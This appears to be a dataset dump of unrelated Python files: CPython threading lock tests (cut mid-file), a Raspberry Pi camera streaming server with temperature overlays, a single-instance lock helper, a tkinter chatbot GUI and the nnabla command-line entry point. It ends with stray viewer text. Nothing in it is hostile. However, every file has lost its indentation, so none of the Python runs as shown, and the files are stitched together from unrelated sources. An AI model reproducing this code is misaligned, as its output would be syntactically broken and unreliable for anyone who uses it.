# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
blacklist = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, blacklist=blacklist)
if __name__ == "__main__":
unittest.main()
|
server.py
|
#!/usr/bin/env python
import sys
import io
import os
import shutil
from subprocess import Popen, PIPE
from string import Template
from struct import Struct
from threading import Thread
from time import sleep, time
from http.server import HTTPServer, BaseHTTPRequestHandler
from wsgiref.simple_server import make_server
import datetime as dt
import picamera
from ws4py.websocket import WebSocket
from ws4py.server.wsgirefserver import (
WSGIServer,
WebSocketWSGIHandler,
WebSocketWSGIRequestHandler,
)
from ws4py.server.wsgiutils import WebSocketWSGIApplication
###########################################
# CONFIGURATION
WIDTH = 640
HEIGHT = 480
FRAMERATE = 24
HTTP_PORT = 8082
WS_PORT = 8084
COLOR = u'#444'
BGCOLOR = u'#333'
JSMPEG_MAGIC = b'jsmp'
JSMPEG_HEADER = Struct('>4sHH')
VFLIP = False
HFLIP = False
###########################################
class StreamingHttpHandler(BaseHTTPRequestHandler):
def do_HEAD(self):
self.do_GET()
def do_GET(self):
if self.path == '/':
self.send_response(301)
self.send_header('Location', '/index.html')
self.end_headers()
return
elif self.path == '/jsmpg.js':
content_type = 'application/javascript'
content = self.server.jsmpg_content
elif self.path == '/index.html':
content_type = 'text/html; charset=utf-8'
tpl = Template(self.server.index_template)
content = tpl.safe_substitute(dict(
WS_PORT=WS_PORT, WIDTH=WIDTH, HEIGHT=HEIGHT, COLOR=COLOR,
BGCOLOR=BGCOLOR))
else:
self.send_error(404, 'File not found')
return
content = content.encode('utf-8')
self.send_response(200)
self.send_header('Content-Type', content_type)
self.send_header('Content-Length', len(content))
self.send_header('Last-Modified', self.date_time_string(time()))
self.end_headers()
if self.command == 'GET':
self.wfile.write(content)
class StreamingHttpServer(HTTPServer):
def __init__(self):
super(StreamingHttpServer, self).__init__(
('', HTTP_PORT), StreamingHttpHandler)
with io.open('index.html', 'r') as f:
self.index_template = f.read()
with io.open('jsmpg.js', 'r') as f:
self.jsmpg_content = f.read()
class StreamingWebSocket(WebSocket):
def opened(self):
self.send(JSMPEG_HEADER.pack(JSMPEG_MAGIC, WIDTH, HEIGHT), binary=True)
class BroadcastOutput(object):
def __init__(self, camera):
print('Spawning background conversion process')
self.converter = Popen([
'ffmpeg',
'-f', 'rawvideo',
'-pix_fmt', 'yuv420p',
'-s', '%dx%d' % camera.resolution,
'-r', str(float(camera.framerate)),
'-i', '-',
'-f', 'mpeg1video',
'-b', '800k',
'-r', str(float(camera.framerate)),
'-'],
stdin=PIPE, stdout=PIPE, stderr=io.open(os.devnull, 'wb'),
shell=False, close_fds=True)
def write(self, b):
self.converter.stdin.write(b)
def flush(self):
print('Waiting for background conversion process to exit')
self.converter.stdin.close()
self.converter.wait()
class BroadcastThread(Thread):
def __init__(self, converter, websocket_server):
super(BroadcastThread, self).__init__()
self.converter = converter
self.websocket_server = websocket_server
def run(self):
try:
while True:
buf = self.converter.stdout.read1(32768)
if buf:
self.websocket_server.manager.broadcast(buf, binary=True)
elif self.converter.poll() is not None:
break
finally:
self.converter.stdout.close()
def cpu_temp():
temp = os.popen("vcgencmd measure_temp").readline()
return (temp.replace("temp=",""))
def main():
print('Initializing camera')
with picamera.PiCamera() as camera:
camera.resolution = (WIDTH, HEIGHT)
camera.framerate = FRAMERATE
camera.vflip = VFLIP # flips image rightside up, as needed
camera.hflip = HFLIP # flips image left-right, as needed
sleep(1) # camera warm-up time
print('Initializing websockets server on port %d' % WS_PORT)
WebSocketWSGIHandler.http_version = '1.1'
websocket_server = make_server(
'', WS_PORT,
server_class=WSGIServer,
handler_class=WebSocketWSGIRequestHandler,
app=WebSocketWSGIApplication(handler_cls=StreamingWebSocket))
websocket_server.initialize_websockets_manager()
websocket_thread = Thread(target=websocket_server.serve_forever)
print('Initializing HTTP server on port %d' % HTTP_PORT)
http_server = StreamingHttpServer()
http_thread = Thread(target=http_server.serve_forever)
print('Initializing broadcast thread')
output = BroadcastOutput(camera)
broadcast_thread = BroadcastThread(output.converter, websocket_server)
print('Starting recording')
camera.start_recording(output, 'yuv')
try:
print('Starting websockets thread')
websocket_thread.start()
print('Starting HTTP server thread')
http_thread.start()
print('Starting broadcast thread')
broadcast_thread.start()
while True:
overlayString = ""
tfile = open("/sys/bus/w1/devices/w1_bus_master1/28-0417837f42ff/w1_slave")
text1 = tfile.read()
tfile.close()
tempdata1 = text1.split()[-1]
temp1 = float(tempdata1[2:])
temp1 = temp1 / 1000
temp1 = '%6.2f'%temp1
tfile2 = open("/sys/bus/w1/devices/w1_bus_master1/28-0517908cbdff/w1_slave")
text2 = tfile2.read()
tfile2.close()
tempdata2 = text2.split()[-1]
temp2 = float(tempdata2[2:])
temp2 = temp2 / 1000
temp2 = '%6.2f'%temp2
tfile3 = open("/sys/bus/w1/devices/w1_bus_master1/28-051790b51aff/w1_slave")
text3 = tfile3.read()
tfile3.close()
tempdata3 = text3.split()[-1]
temp3 = float(tempdata3[2:])
temp3 = temp3 / 1000
temp3 = '%6.2f'%temp3
camera.annotate_text_size = 20
overlayString += 'BED1: '+str(temp1)+'C'
overlayString += ' ROOM: '+str(temp2)+'C'
overlayString += ' BED2: '+str(temp3)+'C'
overlayString += ' CPU '+str(cpu_temp())
overlayString += '\n'+dt.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
camera.annotate_text = overlayString
camera.wait_recording(1)
except KeyboardInterrupt:
pass
finally:
print('Stopping recording')
camera.stop_recording()
print('Waiting for broadcast thread to finish')
broadcast_thread.join()
print('Shutting down HTTP server')
http_server.shutdown()
print('Shutting down websockets server')
websocket_server.shutdown()
print('Waiting for HTTP server thread to finish')
http_thread.join()
print('Waiting for websockets thread to finish')
websocket_thread.join()
if __name__ == '__main__':
main()
|
singleton.py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# ----------------------------------------
# 保证一个程序只有一个实例在运行。
# 例如,防止 crontab 调用两个程序实例。
#
# 使用方法:
# >>> import singleton
# >>> lockfile = "/tmp/<app>.lock"
# >>> instance = singleton.SingleInstance(lockfile)
# will sys.exit(-1) if other instance is running
#
# 参考:
# http://stackoverflow.com/questions/380870/python-single-instance-of-program
# https://github.com/ssbarnea/tendo/blob/master/tendo/singleton.py
# ----------------------------------------
import sys
import unittest
import fcntl
class SingleInstance(object):
"""
If you want to prevent your script from running in parallel just
instantiate SingleInstance() class. If is there another instance already
running it will exist the application with the message "Another instance
is already running, quitting.", returning -1 error code.
This option is very useful if you have scripts executed by crontab
at small amounts of time.
Remember that this works by creating a lock file with a filename based
on the full path to the script file.
"""
def __init__(self, lockfile):
self.lockfile = lockfile
self.fp = open(self.lockfile, 'w')
try:
fcntl.lockf(self.fp, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError:
sys.exit(-1)
def __str__(self):
return "SingleInstance with lock file: %s" % self.lockfile
test_lock_file = "/tmp/test_lock_file.lock"
def f():
instance = SingleInstance(test_lock_file)
print instance
class testSingleton(unittest.TestCase):
def test_1(self):
instance = SingleInstance(test_lock_file)
print instance
def test_2(self):
from multiprocessing import Process
instance = SingleInstance(test_lock_file)
print instance
p = Process(target=f)
p.start()
p.join()
# the called function should fail because we already have another
# instance running note, we return -1 but this translates to 255
# meanwhile we'll consider that anything different from 0 is good
print p.exitcode
assert(not p.exitcode == 0)
if __name__ == "__main__":
unittest.main()
|
gui.py
|
from tkinter import *
import time
import tkinter.messagebox
from bot import chat
import pyttsx3
import threading
saved_username = ["You"]
window_size="400x400"
class ChatInterface(Frame):
def __init__(self, master=None):
Frame.__init__(self, master)
self.master = master
# sets default bg for top level windows
self.tl_bg = "#EEEEEE"
self.tl_bg2 = "#EEEEEE"
self.tl_fg = "#000000"
self.font = "Verdana 10"
menu = Menu(self.master)
self.master.config(menu=menu, bd=5)
# Menu bar
# File
file = Menu(menu, tearoff=0)
menu.add_cascade(label="File", menu=file)
file.add_command(label="Clear Chat", command=self.clear_chat)
file.add_command(label="Exit",command=self.chatexit)
# Options
options = Menu(menu, tearoff=0)
menu.add_cascade(label="Options", menu=options)
# username
# font
font = Menu(options, tearoff=0)
options.add_cascade(label="Font", menu=font)
font.add_command(label="Default",command=self.font_change_default)
font.add_command(label="Times",command=self.font_change_times)
font.add_command(label="System",command=self.font_change_system)
font.add_command(label="Helvetica",command=self.font_change_helvetica)
font.add_command(label="Fixedsys",command=self.font_change_fixedsys)
# color theme
color_theme = Menu(options, tearoff=0)
options.add_cascade(label="Color Theme", menu=color_theme)
color_theme.add_command(label="Default",command=self.color_theme_default)
color_theme.add_command(label="Grey",command=self.color_theme_grey)
color_theme.add_command(label="Blue",command=self.color_theme_dark_blue)
color_theme.add_command(label="Torque",command=self.color_theme_turquoise)
color_theme.add_command(label="Hacker",command=self.color_theme_hacker)
self.text_frame = Frame(self.master, bd=6)
self.text_frame.pack(expand=True, fill=BOTH)
# scrollbar for text box
self.text_box_scrollbar = Scrollbar(self.text_frame, bd=0)
self.text_box_scrollbar.pack(fill=Y, side=RIGHT)
# contains messages
self.text_box = Text(self.text_frame, yscrollcommand=self.text_box_scrollbar.set, state=DISABLED,
bd=1, padx=6, pady=6, spacing3=8, wrap=WORD, bg=None, font="Verdana 10", relief=GROOVE,
width=10, height=1)
self.text_box.pack(expand=True, fill=BOTH)
self.text_box_scrollbar.config(command=self.text_box.yview)
# frame containing user entry field
self.entry_frame = Frame(self.master, bd=1)
self.entry_frame.pack(side=LEFT, fill=BOTH, expand=True)
# entry field
self.entry_field = Entry(self.entry_frame, bd=1, justify=LEFT)
self.entry_field.pack(fill=X, padx=6, pady=6, ipady=3)
# frame containing send button and emoji button
self.send_button_frame = Frame(self.master, bd=0)
self.send_button_frame.pack(fill=BOTH)
# send button
self.send_button = Button(self.send_button_frame, text="Send", width=5, relief=GROOVE, bg='white',
bd=1, command=lambda: self.send_message_insert(None), activebackground="#FFFFFF",
activeforeground="#000000")
self.send_button.pack(side=LEFT, ipady=8)
self.master.bind("<Return>", self.send_message_insert)
self.last_sent_label(date="No messages sent.")
def playResponce(self,responce):
x=pyttsx3.init()
li = []
if len(responce) > 100:
if responce.find('--') == -1:
b = responce.split('--')
x.setProperty('rate',120)
x.setProperty('volume',100)
x.say(responce)
x.runAndWait()
def last_sent_label(self, date):
try:
self.sent_label.destroy()
except AttributeError:
pass
self.sent_label = Label(self.entry_frame, font="Verdana 7", text=date, bg=self.tl_bg2, fg=self.tl_fg)
self.sent_label.pack(side=LEFT, fill=X, padx=3)
def clear_chat(self):
self.text_box.config(state=NORMAL)
self.last_sent_label(date="No messages sent.")
self.text_box.delete(1.0, END)
self.text_box.delete(1.0, END)
self.text_box.config(state=DISABLED)
def chatexit(self):
exit()
def send_message_insert(self, message):
user_input = self.entry_field.get()
pr1 = "Human : " + user_input + "\n"
self.text_box.configure(state=NORMAL)
self.text_box.insert(END, pr1)
self.text_box.configure(state=DISABLED)
self.text_box.see(END)
ob=chat(user_input)
pr="PyBot : " + ob + "\n"
self.text_box.configure(state=NORMAL)
self.text_box.insert(END, pr)
self.text_box.configure(state=DISABLED)
self.text_box.see(END)
self.last_sent_label(str(time.strftime( "Last message sent: " + '%B %d, %Y' + ' at ' + '%I:%M %p')))
self.entry_field.delete(0,END)
time.sleep(0)
t2 = threading.Thread(target=self.playResponce, args=(ob,))
t2.start()
def font_change_default(self):
self.text_box.config(font="Verdana 10")
self.entry_field.config(font="Verdana 10")
self.font = "Verdana 10"
def font_change_times(self):
self.text_box.config(font="Times")
self.entry_field.config(font="Times")
self.font = "Times"
def font_change_system(self):
self.text_box.config(font="System")
self.entry_field.config(font="System")
self.font = "System"
def font_change_helvetica(self):
self.text_box.config(font="helvetica 10")
self.entry_field.config(font="helvetica 10")
self.font = "helvetica 10"
def font_change_fixedsys(self):
self.text_box.config(font="fixedsys")
self.entry_field.config(font="fixedsys")
self.font = "fixedsys"
def color_theme_default(self):
self.master.config(bg="#EEEEEE")
self.text_frame.config(bg="#EEEEEE")
self.entry_frame.config(bg="#EEEEEE")
self.text_box.config(bg="#FFFFFF", fg="#000000")
self.entry_field.config(bg="#FFFFFF", fg="#000000", insertbackground="#000000")
self.send_button_frame.config(bg="#EEEEEE")
self.send_button.config(bg="#FFFFFF", fg="#000000", activebackground="#FFFFFF", activeforeground="#000000")
self.sent_label.config(bg="#EEEEEE", fg="#000000")
self.tl_bg = "#FFFFFF"
self.tl_bg2 = "#EEEEEE"
self.tl_fg = "#000000"
# Dark
def color_theme_dark(self):
self.master.config(bg="#2a2b2d")
self.text_frame.config(bg="#2a2b2d")
self.text_box.config(bg="#212121", fg="#FFFFFF")
self.entry_frame.config(bg="#2a2b2d")
self.entry_field.config(bg="#212121", fg="#FFFFFF", insertbackground="#FFFFFF")
self.send_button_frame.config(bg="#2a2b2d")
self.send_button.config(bg="#212121", fg="#FFFFFF", activebackground="#212121", activeforeground="#FFFFFF")
self.sent_label.config(bg="#2a2b2d", fg="#FFFFFF")
self.tl_bg = "#212121"
self.tl_bg2 = "#2a2b2d"
self.tl_fg = "#FFFFFF"
# Grey
def color_theme_grey(self):
self.master.config(bg="#444444")
self.text_frame.config(bg="#444444")
self.text_box.config(bg="#4f4f4f", fg="#ffffff")
self.entry_frame.config(bg="#444444")
self.entry_field.config(bg="#4f4f4f", fg="#ffffff", insertbackground="#ffffff")
self.send_button_frame.config(bg="#444444")
self.send_button.config(bg="#4f4f4f", fg="#ffffff", activebackground="#4f4f4f", activeforeground="#ffffff")
self.sent_label.config(bg="#444444", fg="#ffffff")
self.tl_bg = "#4f4f4f"
self.tl_bg2 = "#444444"
self.tl_fg = "#ffffff"
def color_theme_turquoise(self):
self.master.config(bg="#003333")
self.text_frame.config(bg="#003333")
self.text_box.config(bg="#669999", fg="#FFFFFF")
self.entry_frame.config(bg="#003333")
self.entry_field.config(bg="#669999", fg="#FFFFFF", insertbackground="#FFFFFF")
self.send_button_frame.config(bg="#003333")
self.send_button.config(bg="#669999", fg="#FFFFFF", activebackground="#669999", activeforeground="#FFFFFF")
self.sent_label.config(bg="#003333", fg="#FFFFFF")
self.tl_bg = "#669999"
self.tl_bg2 = "#003333"
self.tl_fg = "#FFFFFF"
# Blue
def color_theme_dark_blue(self):
self.master.config(bg="#263b54")
self.text_frame.config(bg="#263b54")
self.text_box.config(bg="#1c2e44", fg="#FFFFFF")
self.entry_frame.config(bg="#263b54")
self.entry_field.config(bg="#1c2e44", fg="#FFFFFF", insertbackground="#FFFFFF")
self.send_button_frame.config(bg="#263b54")
self.send_button.config(bg="#1c2e44", fg="#FFFFFF", activebackground="#1c2e44", activeforeground="#FFFFFF")
self.sent_label.config(bg="#263b54", fg="#FFFFFF")
self.tl_bg = "#1c2e44"
self.tl_bg2 = "#263b54"
self.tl_fg = "#FFFFFF"
# Torque
def color_theme_turquoise(self):
self.master.config(bg="#003333")
self.text_frame.config(bg="#003333")
self.text_box.config(bg="#669999", fg="#FFFFFF")
self.entry_frame.config(bg="#003333")
self.entry_field.config(bg="#669999", fg="#FFFFFF", insertbackground="#FFFFFF")
self.send_button_frame.config(bg="#003333")
self.send_button.config(bg="#669999", fg="#FFFFFF", activebackground="#669999", activeforeground="#FFFFFF")
self.sent_label.config(bg="#003333", fg="#FFFFFF")
self.tl_bg = "#669999"
self.tl_bg2 = "#003333"
self.tl_fg = "#FFFFFF"
# Hacker
def color_theme_hacker(self):
self.master.config(bg="#0F0F0F")
self.text_frame.config(bg="#0F0F0F")
self.entry_frame.config(bg="#0F0F0F")
self.text_box.config(bg="#0F0F0F", fg="#33FF33")
self.entry_field.config(bg="#0F0F0F", fg="#33FF33", insertbackground="#33FF33")
self.send_button_frame.config(bg="#0F0F0F")
self.send_button.config(bg="#0F0F0F", fg="#FFFFFF", activebackground="#0F0F0F", activeforeground="#FFFFFF")
self.sent_label.config(bg="#0F0F0F", fg="#33FF33")
self.tl_bg = "#0F0F0F"
self.tl_bg2 = "#0F0F0F"
self.tl_fg = "#33FF33"
# Default font and color theme
def default_format(self):
self.font_change_default()
self.color_theme_default()
root=Tk()
a = ChatInterface(root)
root.geometry(window_size)
root.title("ConvBot")
root.iconbitmap('i.ico')
root.mainloop()
|
cli.py
|
# Copyright (c) 2017 Sony Corporation. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import sys
import warnings
warnings.filterwarnings("ignore", message="numpy.dtype size changed")
def _nnabla_version():
import nnabla
return 'Version {}'.format(nnabla.__version__) + \
', ' + \
'Build {}'.format(nnabla.__build_number__)
def version_command(args):
print(_nnabla_version())
return_value = None
def main():
global return_value
import six.moves._thread as thread
import threading
thread.stack_size(128 * 1024 * 1024)
sys.setrecursionlimit(0x3fffffff)
main_thread = threading.Thread(target=cli_main)
main_thread.start()
main_thread.join()
if not return_value:
sys.exit(-1)
def cli_main():
global return_value
return_value = False
import nnabla
parser = argparse.ArgumentParser(description='Command line interface ' +
'for NNabla({})'.format(_nnabla_version()))
parser.add_argument(
'-m', '--mpi', help='exec with mpi.', action='store_true')
subparsers = parser.add_subparsers()
from nnabla.utils.cli.train import add_train_command
add_train_command(subparsers)
from nnabla.utils.cli.forward import add_infer_command, add_forward_command
add_infer_command(subparsers)
add_forward_command(subparsers)
from nnabla.utils.cli.encode_decode_param import add_decode_param_command, add_encode_param_command
add_encode_param_command(subparsers)
add_decode_param_command(subparsers)
from nnabla.utils.cli.profile import add_profile_command
add_profile_command(subparsers)
from nnabla.utils.cli.conv_dataset import add_conv_dataset_command
add_conv_dataset_command(subparsers)
from nnabla.utils.cli.compare_with_cpu import add_compare_with_cpu_command
add_compare_with_cpu_command(subparsers)
from nnabla.utils.cli.create_image_classification_dataset import add_create_image_classification_dataset_command
add_create_image_classification_dataset_command(subparsers)
from nnabla.utils.cli.uploader import add_upload_command
add_upload_command(subparsers)
from nnabla.utils.cli.uploader import add_create_tar_command
add_create_tar_command(subparsers)
from nnabla.utils.cli.convert import add_convert_command
add_convert_command(subparsers)
from nnabla.utils.cli.func_info import add_function_info_command
add_function_info_command(subparsers)
from nnabla.utils.cli.plot import (
add_plot_series_command, add_plot_timer_command)
add_plot_series_command(subparsers)
add_plot_timer_command(subparsers)
from nnabla.utils.cli.draw_graph import add_draw_graph_command
add_draw_graph_command(subparsers)
# Version
subparser = subparsers.add_parser(
'version', help='Print version and build number.')
subparser.set_defaults(func=version_command)
print('NNabla command line interface (Version {}, Build {})'.format(
nnabla.__version__, nnabla.__build_number__))
args = parser.parse_args()
if 'func' not in args:
parser.print_help(sys.stderr)
return
if args.mpi:
from nnabla.utils.communicator_util import create_communicator
comm = create_communicator()
try:
return_value = args.func(args)
except:
import traceback
print(traceback.format_exc())
comm.abort()
else:
try:
return_value = args.func(args)
except:
import traceback
print(traceback.format_exc())
return_value = False
if __name__ == '__main__':
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.